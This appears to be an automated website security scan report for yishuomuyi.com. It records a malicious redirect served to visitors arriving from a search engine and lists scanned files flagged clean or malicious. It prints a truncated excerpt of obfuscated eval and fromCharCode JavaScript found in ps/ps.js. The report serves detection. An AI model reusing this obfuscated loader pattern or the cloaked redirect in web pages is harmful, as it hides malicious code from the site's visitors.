Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.yishuomuyi.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.yishuomuyi.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Sun, 01 Jun 2014 23:21:26 GMT Location: http://www.80667.net/ Server: Microsoft-IIS/7.0 Content-Length: 142 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABSBBAT=ILOJFFLBCLLNAHEEIAIKGOJC; path=/ X-Powered-By: WAF/2.0 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.yishuomuyi.com/ | 200 OK Content-Length: 26576 Content-Type: text/html | clean |
http://www.yishuomuyi.com/ps/ps.js | 200 OK Content-Length: 10485 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
| ||
http://www.yishuomuyi.com/script.js | 200 OK Content-Length: 1585 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var FitWidth = 200;
var FitHeight = 180; function ResizePic(ImgTag) { var image = new Image(); image.src = ImgTag.src; if(image.width>0 && image.height>0){ if(image.width/image.height >= FitWidth/FitHeight){ if(image.width > FitWidth){ ImgTag.width = FitWidth; ImgTag.height = (image.height*FitWidth)/image.width; } else{ ImgTag.width = image.width; ImgTag.height = image.heig <!-- Antivirus reports:
| ||
http://www.yishuomuyi.com/pro.asp?type=69 | 200 OK Content-Length: 16795 Content-Type: text/html | clean |
http://www.0591tjj.com/link/01.js | 200 OK Content-Length: 74 Content-Type: application/x-javascript | clean |
http://www.yishuomuyi.com/pro.asp?type=70 | 200 OK Content-Length: 16693 Content-Type: text/html | clean |
http://www.yishuomuyi.com/pro.asp?type=72 | 200 OK Content-Length: 16071 Content-Type: text/html | clean |
http://www.yishuomuyi.com/pro.asp?type=74 | 200 OK Content-Length: 13785 Content-Type: text/html | clean |
http://www.yishuomuyi.com/news_show.asp?newsid=42 | 200 OK Content-Length: 14265 Content-Type: text/html | clean |
http://www.yishuomuyi.com/news_show.asp?newsid=41 | 200 OK Content-Length: 14333 Content-Type: text/html | clean |
http://www.yishuomuyi.com/daili.asp | 200 OK Content-Length: 14640 Content-Type: text/html | clean |
http://www.yishuomuyi.com/index.asp | 200 OK Content-Length: 26576 Content-Type: text/html | clean |
http://www.yishuomuyi.com/about.asp | 200 OK Content-Length: 13969 Content-Type: text/html | clean |
http://www.yishuomuyi.com/pro.asp | 200 OK Content-Length: 16842 Content-Type: text/html | clean |
http://www.yishuomuyi.com/pro_show.asp?proid=284 | 200 OK Content-Length: 14179 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yishuomuyi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yishuomuyi.com/
Result: yishuomuyi.com is not infected or malware details are not published yet.
Result: yishuomuyi.com is not infected or malware details are not published yet.